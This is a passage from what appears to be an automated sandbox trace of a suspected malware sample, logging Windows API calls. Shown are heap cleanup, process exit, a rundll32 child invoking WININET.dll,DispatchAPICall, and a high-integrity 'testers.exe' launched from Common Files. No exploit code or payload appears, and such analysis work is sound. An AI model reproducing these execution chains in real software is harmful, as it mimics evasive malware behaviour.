dwFlags=0x0, lpMem=0xe32af8 | out: hHeap=0xbc0000) returned 1 [0260.675] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdedab0 | out: hHeap=0xbc0000) returned 1 [0260.675] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32a48 | out: hHeap=0xbc0000) returned 1 [0260.675] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdda4a0 | out: hHeap=0xbc0000) returned 1 [0260.675] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32a78 | out: hHeap=0xbc0000) returned 1 [0260.675] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdedae0 | out: hHeap=0xbc0000) returned 1 [0260.676] PostQuitMessage (nExitCode=0) [0260.676] GetMessageW (in: lpMsg=0x7dfe6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x7dfe6c) returned 0 [0260.676] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd8b00 | out: hHeap=0xbc0000) returned 1 [0260.676] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd8f08 | out: hHeap=0xbc0000) returned 1 [0260.676] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcc9630 | out: hHeap=0xbc0000) returned 1 [0260.676] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9268 | out: hHeap=0xbc0000) returned 1 [0260.676] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcc95e0 | out: hHeap=0xbc0000) returned 1 [0260.676] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd58b0 | out: hHeap=0xbc0000) returned 1 [0260.676] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9298 | out: hHeap=0xbc0000) returned 1 [0260.676] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9280 | out: hHeap=0xbc0000) returned 1 [0260.676] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd92b0 | out: hHeap=0xbc0000) returned 1 [0260.676] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd92c8 | out: hHeap=0xbc0000) returned 1 [0260.676] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd92e0 | out: hHeap=0xbc0000) returned 1 [0260.676] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcc9608 | out: hHeap=0xbc0000) returned 1 [0260.676] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd8dd0 | out: hHeap=0xbc0000) returned 1 [0260.676] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd8ab8 | out: hHeap=0xbc0000) returned 1 [0260.676] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcc95b8 | out: hHeap=0xbc0000) returned 1 [0260.677] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd8650 | out: hHeap=0xbc0000) returned 1 [0260.677] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd8aa0 | out: hHeap=0xbc0000) returned 1 [0260.677] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcc9568 | out: hHeap=0xbc0000) returned 1 [0260.677] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd58a0 | out: hHeap=0xbc0000) returned 1 [0260.677] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd91f0 | out: hHeap=0xbc0000) returned 1 [0260.677] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd91d8 | out: hHeap=0xbc0000) returned 1 [0260.677] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9208 | out: hHeap=0xbc0000) returned 1 [0260.677] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9220 | out: hHeap=0xbc0000) returned 1 [0260.677] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcc9590 | out: hHeap=0xbc0000) returned 1 [0260.677] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcc94f0 | out: hHeap=0xbc0000) returned 1 [0260.677] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd5870 | out: hHeap=0xbc0000) returned 1 [0260.677] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9130 | out: hHeap=0xbc0000) returned 1 [0260.677] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9118 | out: hHeap=0xbc0000) returned 1 [0260.677] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9148 | out: hHeap=0xbc0000) returned 1 [0260.677] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd8ad0 | out: hHeap=0xbc0000) returned 1 [0260.677] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd5880 | out: hHeap=0xbc0000) returned 1 [0260.677] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9178 | out: hHeap=0xbc0000) returned 1 [0260.677] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9160 | out: hHeap=0xbc0000) returned 1 [0260.677] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcc9540 | out: hHeap=0xbc0000) returned 1 [0260.677] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd5890 | out: hHeap=0xbc0000) returned 1 [0260.677] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd91a8 | out: hHeap=0xbc0000) returned 1 [0260.677] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9190 | out: hHeap=0xbc0000) returned 1 [0260.677] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd91c0 | out: hHeap=0xbc0000) returned 1 [0260.677] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcc9518 | out: hHeap=0xbc0000) returned 1 [0260.677] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd86c8 | out: hHeap=0xbc0000) returned 1 [0260.677] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd5840 | out: hHeap=0xbc0000) returned 1 [0260.678] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9058 | out: hHeap=0xbc0000) returned 1 [0260.678] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9040 | out: hHeap=0xbc0000) returned 1 [0260.678] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd8a88 | out: hHeap=0xbc0000) returned 1 [0260.678] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd5850 | out: hHeap=0xbc0000) returned 1 [0260.678] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9088 | out: hHeap=0xbc0000) returned 1 [0260.678] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9070 | out: hHeap=0xbc0000) returned 1 [0260.678] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd90a0 | out: hHeap=0xbc0000) returned 1 [0260.678] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd8b30 | out: hHeap=0xbc0000) returned 1 [0260.678] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd5860 | out: hHeap=0xbc0000) returned 1 [0260.678] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd90d0 | out: hHeap=0xbc0000) returned 1 [0260.678] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd90b8 | out: hHeap=0xbc0000) returned 1 [0260.678] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd90e8 | out: hHeap=0xbc0000) returned 1 [0260.678] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9100 | out: hHeap=0xbc0000) returned 1 [0260.678] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcc94c8 | out: hHeap=0xbc0000) returned 1 [0260.678] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd8b48 | out: hHeap=0xbc0000) returned 1 [0260.678] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd5800 | out: hHeap=0xbc0000) returned 1 [0260.678] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd8f38 | out: hHeap=0xbc0000) returned 1 [0260.678] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd8f20 | out: hHeap=0xbc0000) returned 1 [0260.678] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcde5c0 | out: hHeap=0xbc0000) returned 1 [0260.678] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd5810 | out: hHeap=0xbc0000) returned 1 [0260.678] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd8f68 | out: hHeap=0xbc0000) returned 1 [0260.678] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd8f50 | out: hHeap=0xbc0000) returned 1 [0260.678] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd8f80 | out: hHeap=0xbc0000) returned 1 [0260.678] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcc94a0 | out: hHeap=0xbc0000) returned 1 [0260.678] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd5820 | out: hHeap=0xbc0000) returned 1 [0260.678] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd8fb0 | out: hHeap=0xbc0000) returned 1 [0260.678] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd8f98 | out: hHeap=0xbc0000) returned 1 [0260.679] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd8fc8 | out: hHeap=0xbc0000) returned 1 [0260.679] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc43678 | out: hHeap=0xbc0000) returned 1 [0260.679] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd5830 | out: hHeap=0xbc0000) returned 1 [0260.679] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd8ff8 | out: hHeap=0xbc0000) returned 1 [0260.679] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd8fe0 | out: hHeap=0xbc0000) returned 1 [0260.679] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9010 | out: hHeap=0xbc0000) returned 1 [0260.679] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9028 | out: hHeap=0xbc0000) returned 1 [0260.679] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcc9478 | out: hHeap=0xbc0000) returned 1 [0260.679] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd8668 | out: hHeap=0xbc0000) returned 1 [0260.679] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd57c0 | out: hHeap=0xbc0000) returned 1 [0260.679] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd8e00 | out: hHeap=0xbc0000) returned 1 [0260.679] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd8de8 | out: hHeap=0xbc0000) returned 1 [0260.679] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcde588 | out: hHeap=0xbc0000) returned 1 [0260.679] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd57d0 | out: hHeap=0xbc0000) returned 1 [0260.679] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd8e30 | out: hHeap=0xbc0000) returned 1 [0260.679] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd8e18 | out: hHeap=0xbc0000) returned 1 [0260.679] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd8e48 | out: hHeap=0xbc0000) returned 1 [0260.679] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcc9428 | out: hHeap=0xbc0000) returned 1 [0260.679] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd57e0 | out: hHeap=0xbc0000) returned 1 [0260.679] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd8e78 | out: hHeap=0xbc0000) returned 1 [0260.679] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd8e60 | out: hHeap=0xbc0000) returned 1 [0260.679] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd8e90 | out: hHeap=0xbc0000) returned 1 [0260.679] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcde5f8 | out: hHeap=0xbc0000) returned 1 [0260.679] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd57f0 | out: hHeap=0xbc0000) returned 1 [0260.680] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd8ec0 | out: hHeap=0xbc0000) returned 1 [0260.680] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd8ea8 | out: hHeap=0xbc0000) returned 1 [0260.680] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd8ed8 | out: hHeap=0xbc0000) returned 1 [0260.680] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd8ef0 | out: hHeap=0xbc0000) returned 1 [0260.680] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcc9450 | out: hHeap=0xbc0000) returned 1 [0260.680] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd8b18 | out: hHeap=0xbc0000) returned 1 [0260.680] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd5780 | out: hHeap=0xbc0000) returned 1 [0260.680] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd86e0 | out: hHeap=0xbc0000) returned 1 [0260.680] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd8740 | out: hHeap=0xbc0000) returned 1 [0260.680] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcde550 | out: hHeap=0xbc0000) returned 1 [0260.680] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd5790 | out: hHeap=0xbc0000) returned 1 [0260.680] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd8cf8 | out: hHeap=0xbc0000) returned 1 [0260.680] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd8ce0 | out: hHeap=0xbc0000) returned 1 [0260.680] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd8d10 | out: hHeap=0xbc0000) returned 1 [0260.680] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcc93d8 | out: hHeap=0xbc0000) returned 1 [0260.680] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd57a0 | out: hHeap=0xbc0000) returned 1 [0260.680] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd8d40 | out: hHeap=0xbc0000) returned 1 [0260.680] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd8d28 | out: hHeap=0xbc0000) returned 1 [0260.680] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd8d58 | out: hHeap=0xbc0000) returned 1 [0260.680] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd8698 | out: hHeap=0xbc0000) returned 1 [0260.680] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd57b0 | out: hHeap=0xbc0000) returned 1 [0260.680] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd8d88 | out: hHeap=0xbc0000) returned 1 [0260.680] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd8d70 | out: hHeap=0xbc0000) returned 1 [0260.680] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd8da0 | out: hHeap=0xbc0000) returned 1 [0260.681] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd8db8 | out: hHeap=0xbc0000) returned 1 [0260.681] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcc9400 | out: hHeap=0xbc0000) returned 1 [0260.681] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd8710 | out: hHeap=0xbc0000) returned 1 [0260.681] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd5740 | out: hHeap=0xbc0000) returned 1 [0260.681] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd8b78 | out: hHeap=0xbc0000) returned 1 [0260.681] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd8b60 | out: hHeap=0xbc0000) returned 1 [0260.681] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd8728 | out: hHeap=0xbc0000) returned 1 [0260.681] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd5750 | out: hHeap=0xbc0000) returned 1 [0260.681] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd8ba8 | out: hHeap=0xbc0000) returned 1 [0260.681] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd8b90 | out: hHeap=0xbc0000) returned 1 [0260.681] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd8bc0 | out: hHeap=0xbc0000) returned 1 [0260.681] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd8a70 | out: hHeap=0xbc0000) returned 1 [0260.681] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd5760 | out: hHeap=0xbc0000) returned 1 [0260.681] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd8bf0 | out: hHeap=0xbc0000) returned 1 [0260.681] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd8bd8 | out: hHeap=0xbc0000) returned 1 [0260.686] SetCurrentDirectoryW (lpPathName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32")) returned 1 [0260.691] mciSendStringW (in: lpstrCommand="close all", lpstrReturnString=0x0, uReturnLength=0x0, hwndCallback=0x0 | out: lpstrReturnString=0x0) returned 0x0 [0260.691] OleUninitialize () [0260.693] ExitProcess (uExitCode=0x0) Thread: id = 266 os_tid = 0x5a4 Thread: id = 267 os_tid = 0x504 Thread: id = 268 os_tid = 0x7cc Thread: id = 270 os_tid = 0x61c Thread: id = 271 os_tid = 0x7ac Thread: id = 273 os_tid = 0x1d0 Thread: id = 274 os_tid = 0x6cc Thread: id = 277 os_tid = 0x574 Process: id = "38" image_name = "rundll32.exe" filename = "c:\\windows\\syswow64\\rundll32.exe" page_root = "0x5fea0000" os_pid = "0x5d4" os_integrity_level = "0x1000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "37" os_parent_pid = "0x350" cmd_line = "\"C:\\Windows\\system32\\rundll32.exe\" \"C:\\Windows\\syswow64\\WININET.dll\",DispatchAPICall 1 " cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e39d" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 269 os_tid = 0x630 Thread: id = 272 os_tid = 0x7f4 Thread: id = 275 os_tid = 0x640 Thread: id = 276 os_tid = 0x4d4 Thread: id = 278 os_tid = 0x5c0 Thread: id = 279 os_tid = 0x5d8 Process: id = "39" image_name = "testers.exe" filename = "c:\\progra~2\\common~1\\testers.exe" page_root = "0x5ef8c000" os_pid = "0x670" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "37" os_parent_pid = "0x350" cmd_line = "C:\\PROGRA~2\\COMMON~1\\testers.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e39d" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 280 os_tid = 0x7a0 [0260.951] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x93fe90 | out: lpSystemTimeAsFileTime=0x93fe90*(dwLowDateTime=0x3cf8d7f0, dwHighDateTime=0x1d661be)) [0260.951] GetCurrentThreadId () returned 0x7a0 [0260.951] GetCurrentProcessId () returned 0x670 [0260.951] QueryPerformanceCounter (in: lpPerformanceCount=0x93fe88 | out: lpPerformanceCount=0x93fe88*=19147840890) returned 1 [0260.983] GetStartupInfoW (in: lpStartupInfo=0x93fe20 | out: lpStartupInfo=0x93fe20*(cb=0x44, lpReserved="", lpDesktop="winsta0\\default", lpTitle="C:\\PROGRA~2\\COMMON~1\\testers.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x7737fd35, hStdError=0x773e7daf)) [0260.983] GetProcessHeap () returned 0xc60000 [0260.986] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75990000 [0260.987] GetProcAddress (hModule=0x75990000, lpProcName="FlsAlloc") returned 0x759a4f2b [0260.987] GetProcAddress (hModule=0x75990000, lpProcName="FlsFree") returned 0x759a359f [0260.987] GetProcAddress (hModule=0x75990000, lpProcName="FlsGetValue") returned 0x759a1252 [0260.987] GetProcAddress (hModule=0x75990000, lpProcName="FlsSetValue") returned 0x759a4208 [0260.988] GetProcAddress (hModule=0x75990000, lpProcName="InitializeCriticalSectionEx") returned 0x759a4d28 [0260.988] GetProcAddress (hModule=0x75990000, lpProcName="CreateEventExW") returned 0x75a2410b [0260.988] GetProcAddress (hModule=0x75990000, lpProcName="CreateSemaphoreExW") returned 0x75a24195 [0260.988] GetProcAddress (hModule=0x75990000, lpProcName="SetThreadStackGuarantee") returned 0x759ad31f [0260.988] GetProcAddress (hModule=0x75990000, lpProcName="CreateThreadpoolTimer") returned 0x759bee7e [0260.988] GetProcAddress (hModule=0x75990000, lpProcName="SetThreadpoolTimer") returned 0x773a441c [0260.988] GetProcAddress (hModule=0x75990000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x773cc50e [0260.988] GetProcAddress (hModule=0x75990000, lpProcName="CloseThreadpoolTimer") returned 0x773cc381 [0260.989] GetProcAddress (hModule=0x75990000, lpProcName="CreateThreadpoolWait") returned 0x759bf088 [0260.989] GetProcAddress (hModule=0x75990000, lpProcName="SetThreadpoolWait") returned 0x773b05d7 [0260.989] GetProcAddress (hModule=0x75990000, lpProcName="CloseThreadpoolWait") returned 0x773cca24 [0260.989] GetProcAddress (hModule=0x75990000, lpProcName="FlushProcessWriteBuffers") returned 0x77380b8c [0260.990] GetProcAddress (hModule=0x75990000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x7743fde8 [0260.990] GetProcAddress (hModule=0x75990000, lpProcName="GetCurrentProcessorNumber") returned 0x773d1e1d [0260.990] GetProcAddress (hModule=0x75990000, lpProcName="GetLogicalProcessorInformation") returned 0x75a24761 [0260.990] GetProcAddress (hModule=0x75990000, lpProcName="CreateSymbolicLinkW") returned 0x75a1cd11 [0260.990] GetProcAddress (hModule=0x75990000, lpProcName="SetDefaultDllDirectories") returned 0x0 [0260.990] GetProcAddress (hModule=0x75990000, lpProcName="EnumSystemLocalesEx") returned 0x75a2424f [0260.990] GetProcAddress (hModule=0x75990000, lpProcName="CompareStringEx") returned 0x75a246b1 [0260.991] GetProcAddress (hModule=0x75990000, lpProcName="GetDateFormatEx") returned 0x75a36676 [0260.991] GetProcAddress (hModule=0x75990000, lpProcName="GetLocaleInfoEx") returned 0x75a24751 [0260.991] GetProcAddress (hModule=0x75990000, lpProcName="GetTimeFormatEx") returned 0x75a365f1 [0260.991] GetProcAddress (hModule=0x75990000, lpProcName="GetUserDefaultLocaleName") returned 0x75a247c1 [0260.991] GetProcAddress (hModule=0x75990000, lpProcName="IsValidLocaleName") returned 0x75a247e1 [0260.991] GetProcAddress (hModule=0x75990000, lpProcName="LCMapStringEx") returned 0x75a247f1 [0260.991] GetProcAddress (hModule=0x75990000, lpProcName="GetCurrentPackageId") returned 0x0 [0260.991] GetProcAddress (hModule=0x75990000, lpProcName="GetTickCount64") returned 0x759beee0 [0260.992] GetProcAddress (hModule=0x75990000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0260.992] GetProcAddress (hModule=0x75990000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0260.992] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x8, Size=0x3bc) returned 0xc81f08 [0260.992] GetCurrentThreadId () returned 0x7a0 [0260.992] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x18) returned 0xc72a08 [0260.993] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x8, Size=0x800) returned 0xc822d0 [0260.993] GetStartupInfoW (in: lpStartupInfo=0x93fdf0 | out: lpStartupInfo=0x93fdf0*(cb=0x44, lpReserved="", lpDesktop="winsta0\\default", lpTitle="C:\\PROGRA~2\\COMMON~1\\testers.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x2b9d0d, hStdOutput=0x48626a2c, hStdError=0x0)) [0260.993] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0260.993] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0260.993] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0260.993] GetCommandLineW () returned="C:\\PROGRA~2\\COMMON~1\\testers.exe" [0260.993] GetEnvironmentStringsW () returned 0xc82ad8* [0260.993] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xaca) returned 0xc835b0 [0260.993] FreeEnvironmentStringsW (penv=0xc82ad8) returned 1 [0260.993] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x354ba8, nSize=0x104 | out: lpFilename="C:\\PROGRA~2\\COMMON~1\\testers.exe" (normalized: "c:\\progra~2\\common~1\\testers.exe")) returned 0x20 [0260.993] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4a) returned 0xc72a28 [0260.994] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x8, Size=0x98) returned 0xc82ad8 [0260.994] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x8, Size=0x3e) returned 0xc72120 [0260.994] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x8, Size=0x6c) returned 0xc82b78 [0260.994] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x8, Size=0x6e) returned 0xc82bf0 [0260.994] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x8, Size=0x78) returned 0xc6f860 [0260.994] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x8, Size=0x62) returned 0xc82c68 [0260.994] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x8, Size=0x2e) returned 0xc7c588 [0260.994] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x8, Size=0x48) returned 0xc781a0 [0260.994] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x8, Size=0x28) returned 0xc7bfe0 [0260.994] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x8, Size=0x1a) returned 0xc7fb20 [0260.994] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x8, Size=0x4a) returned 0xc82cd8 [0260.994] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x8, Size=0x72) returned 0xc6f8e0 [0260.994] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x8, Size=0x30) returned 0xc7c5c0 [0260.994] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x8, Size=0x2e) returned 0xc7c5f8 [0260.994] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x8, Size=0x1c) returned 0xc7fb48 [0260.994] RtlAllocateHeap 